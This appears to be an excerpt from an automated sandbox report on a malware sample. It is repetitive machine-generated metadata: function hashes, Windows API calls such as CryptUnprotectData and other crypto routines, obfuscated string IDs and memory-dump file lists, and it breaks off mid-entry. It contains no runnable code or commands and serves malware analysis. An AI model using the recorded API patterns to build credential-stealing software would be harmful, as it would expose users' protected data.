                                • Opcode ID: d4beeb6742c3bac520c4af524fbea6253b2c4776e9a4125b018907daa1ece6e8
                                • Instruction ID: 7921b2d9ca62e85b69969e75ad75fe063148f7e8f646b0124909654a78ccff58
                                • Opcode Fuzzy Hash: d4beeb6742c3bac520c4af524fbea6253b2c4776e9a4125b018907daa1ece6e8
                                • Instruction Fuzzy Hash: 61A2E2F3A082009FE3046E29DC8577AFBE9EF94720F1A493DEAC593740E63598058787
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00085184,40000001,00000000,00000000,?,00085184), ref: 00098EC0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                • Instruction ID: 22504cfc9f0935ffe7b6bd86b6a52b0caf35c56c13643e60926f462d9a382a69
                                • Opcode Fuzzy Hash: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                • Instruction Fuzzy Hash: 21110670200208AFDF40CF64E898FAA33A9AF8A304F10E558F9198B350DB35E841EB60
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                • LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                • Instruction ID: 9a6127d002cceeec661d744ba68c76980b915c2151ae74dd58f17e10827b1432
                                • Opcode Fuzzy Hash: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                • Instruction Fuzzy Hash: BA11A2B4241208AFEB10DF64DC99FAA77B5FB89704F208158F9199B390C7B6A901CB94
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D0EB10,00000000,?,000A0E10,00000000,?,00000000,00000000), ref: 00097A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D0EB10,00000000,?,000A0E10,00000000,?,00000000,00000000,?), ref: 00097A7D
                                • wsprintfA.USER32 ref: 00097AB7
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                • Instruction ID: 41ed6f284bbcf8af567a5e4150229919316100de69810ab92589b55dcf55d1a4
                                • Opcode Fuzzy Hash: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                • Instruction Fuzzy Hash: E111A1B1945218EBEB20CF54DC49FA9B7B8FB44721F10439AEA0A932C0C7741E40CF52
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PwvS$er~$iKy$5Kv
                                • API String ID: 0-3787672126
                                • Opcode ID: ad5b6a79a498b63486b241d49aeac34f9f6da16ba335c99480fd7553a0ec905b
                                • Instruction ID: 7f2fe957767b280c8a68eacfed052b212c8d68fb7197b5d53235b96a001d098b
                                • Opcode Fuzzy Hash: ad5b6a79a498b63486b241d49aeac34f9f6da16ba335c99480fd7553a0ec905b
                                • Instruction Fuzzy Hash: BF5228F3A082049FE304AE2DEC8577AB7E5EFD4720F1A863DEAC487344E63558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'S~<$'S~<$6:}$d?>
                                • API String ID: 0-1236524275
                                • Opcode ID: 2a1e8f6ab8f66e4d04f783b19b5a4bd16403439ef3203d78f927036d5aeadf00
                                • Instruction ID: 64b5dcb9173fdf9e37eacb59a801cfacdced8c3b4d0fe3825e6e6b13ff5be66b
                                • Opcode Fuzzy Hash: 2a1e8f6ab8f66e4d04f783b19b5a4bd16403439ef3203d78f927036d5aeadf00
                                • Instruction Fuzzy Hash: EC12F1F391C2149BE3046E29EC8577AF7E9EF94720F1A493DEAC497740EA35980186C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (]$:$7vo$YBw?
                                • API String ID: 0-1142385565
                                • Opcode ID: a807dded01c7a54375c2e40a32eef6f8b36a6a1d019ca15c49a763ff665335ff
                                • Instruction ID: e92d3fe24461035d02c1f162bbca0bd322afd4154359e9511a53d13ff1cc4bf3
                                • Opcode Fuzzy Hash: a807dded01c7a54375c2e40a32eef6f8b36a6a1d019ca15c49a763ff665335ff
                                • Instruction Fuzzy Hash: 78B2D1F360C2109FE708AE29EC8567ABBE5EF94320F16493DEAC5C7744EA3558408797
                                APIs
                                • CoCreateInstance.COMBASE(0009E118,00000000,00000001,0009E108,00000000), ref: 00093758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000937B0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: dec08a625e8e14bd2e47dec7c1cf3db2151d580d1fd73563f541861959016511
                                • Instruction ID: 230e48421756c09bdc13ee2ea01724d8b59b44dde0308d52388d823122923a38
                                • Opcode Fuzzy Hash: dec08a625e8e14bd2e47dec7c1cf3db2151d580d1fd73563f541861959016511
                                • Instruction Fuzzy Hash: DB41F770A00A28AFDB24DB58CC99F9BB7B4BB48702F4041D9E608EB290D7716E85CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                • LocalFree.KERNEL32(?), ref: 00089BD3
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 9b68f31d6274c73bcb70eb664e9522fd1024270f2d04b15a14ae3b76d3383e25
                                • Instruction ID: fb2d16c0dbac09f05b2f036c2ef24b50b4aa651d2a8eb86886c07df7eec0f43d
                                • Opcode Fuzzy Hash: 9b68f31d6274c73bcb70eb664e9522fd1024270f2d04b15a14ae3b76d3383e25
                                • Instruction Fuzzy Hash: F611A5B8A00209EFCB04DF94D989EAEB7B5FB88304F104598E915A7350D770AE10CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: z\|$S6{
                                • API String ID: 0-1815286500
                                • Opcode ID: b486d7a59e8bdda438b872ce32eae2430a03469d97a5120726eaa1bdbdfd86cd
                                • Instruction ID: 6d485b115c5c14dd07b8c2652372437eb25c99add8321d8c68872994df6e145c
                                • Opcode Fuzzy Hash: b486d7a59e8bdda438b872ce32eae2430a03469d97a5120726eaa1bdbdfd86cd
                                • Instruction Fuzzy Hash: D8521AF360C600AFE704AE29EC86B7ABBE5EF94720F19453DE6C4C3744E63598058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Vj|$?Hhw
                                • API String ID: 0-841555557
                                • Opcode ID: 16f8b7c9b0c02fe5cca0157aba3890c04c2251a169403e0f350b0b252c084b1e
                                • Instruction ID: 560893dcba8821982896cf8fdddf6b81513003a3625ce3bf8f3e5d5e3f3a1a79
                                • Opcode Fuzzy Hash: 16f8b7c9b0c02fe5cca0157aba3890c04c2251a169403e0f350b0b252c084b1e
                                • Instruction Fuzzy Hash: 693149F36046045FE300AE29DC4577AB7DAEBC4360F2A863CD6C4C7784F93898068252
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &i;
                                • API String ID: 0-1416332070
                                • Opcode ID: 2503e28d7b63a966c5ebb0cfdd133d4a35f0a1d045b75d6e7d988c135879858b
                                • Instruction ID: 4584737a621cc8ab98ad934acf5a0a3039525a7738c7b8eca696f093b083e268
                                • Opcode Fuzzy Hash: 2503e28d7b63a966c5ebb0cfdd133d4a35f0a1d045b75d6e7d988c135879858b
                                • Instruction Fuzzy Hash: 7F7108F3E086109BE3186E2CDC4577ABBD5EB94320F1B453DEAD987380E93958058686
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e5N_
                                • API String ID: 0-2587021752
                                • Opcode ID: ff1d9684affce1fb6353503229b8034e510bc12153d89a913ec9a1455ff092ec
                                • Instruction ID: 9a6ab95d97f610d1b879d4c5cb728df858e5076b6de4d245bbc3ed461b2907c0
                                • Opcode Fuzzy Hash: ff1d9684affce1fb6353503229b8034e510bc12153d89a913ec9a1455ff092ec
                                • Instruction Fuzzy Hash: BC615BF3B083049FE3046E29EC8577AFBDAEBD8720F16453DD6C887384EA7558048696
                                Strings
                                Memory Dump Source
